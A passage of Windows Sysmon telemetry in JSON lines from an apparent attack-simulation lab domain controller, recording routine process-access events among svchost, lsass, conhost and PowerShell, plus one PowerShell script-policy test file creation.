C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5326,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5327,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nTargetProcessId: 1044\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","TargetProcessId":"1044","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5328,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5329,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.540\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.540","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5330,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.540\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.540","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5331,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.556\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nTargetProcessId: 1044\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.556","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","TargetProcessId":"1044","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5332,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.556\r\nProcessGuid: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nProcessId: 1044\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xvsmdfzn.k3x.ps1\r\nCreationUtcTime: 2020-08-01 06:55:14.556","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.556","ProcessGuid":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xvsmdfzn.k3x.ps1","CreationUtcTime":"2020-08-01 06:55:14.556","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5333,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.587\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nTargetProcessId: 1044\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.587","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","TargetProcessId":"1044","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 